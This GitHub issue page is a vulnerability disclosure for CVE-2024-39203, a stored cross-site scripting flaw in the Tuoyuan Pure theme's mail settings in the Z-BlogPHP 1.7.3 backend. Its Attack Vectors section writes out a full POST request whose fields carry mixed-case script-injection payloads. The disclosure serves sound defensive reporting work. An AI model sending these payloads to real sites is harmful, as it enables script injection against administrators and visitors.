You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Suggested description]
A cross-site scripting (XSS) vulnerability in the Backend Theme.
Management module of Z-BlogPHP v1.7.3 allows attackers to execute
arbitrary web scripts or HTML via a crafted payload.
[Affected Component]
Z-BlogPHP is an open-source PHP based blog system developed by Z-Blog.
Z-LogPHP1.7.3 Backend Theme Management - Tuoyuan Pure Theme has hundreds of storage type XSS vulnerability points
[CVE ID]
CVE-2024-39203
[Suggested description]
A cross-site scripting (XSS) vulnerability in the Backend Theme.
Management module of Z-BlogPHP v1.7.3 allows attackers to execute
arbitrary web scripts or HTML via a crafted payload.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230
[Affected Product Code Base]
Z-BlogPHP - <=1.7.3
[Affected Component]
Z-BlogPHP is an open-source PHP based blog system developed by Z-Blog.
Z-LogPHP1.7.3 Backend Theme Management - Tuoyuan Pure Theme has hundreds of storage type XSS vulnerability points
[Attack Type]
Context-dependent
[CVE Impact Other]
XSS
[Attack Vectors]
POST http://localhost/zblogphp/zb_users/theme/tpure/main.php?act=mail HTTP/1.1
csrfToken=ba34555f34939327c8d05d964d18b4d5&PostMAILON=&SMTP_SSL=0&SMTP_HOST=smtp.163.com&SMTP_PORT=25&FROM_EMAIL=&SMTP_PASS="><ScRiPt>alert(6)</ScRiPt>&FROM_NAME="><ScRiPt>alert(7)</ScRiPt>&MAIL_TO="><ScRiPt>alert(5)</ScRiPt>&PostNEWARTICLEMAILSENDON=0"><ScRiPt>alert(4)</ScRiPt>&PostEDITARTICLEMAILSENDON=0"><ScRiPt>alert(3)</ScRiPt>&PostCMTMAILSENDON=0"><ScRiPt>alert(2)</ScRiPt>&PostREPLYMAILSENDON=0"><ScRiPt>alert(1)</ScRiPt>
[Reference]
http://z-blogphp.com
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230
The text was updated successfully, but these errors were encountered: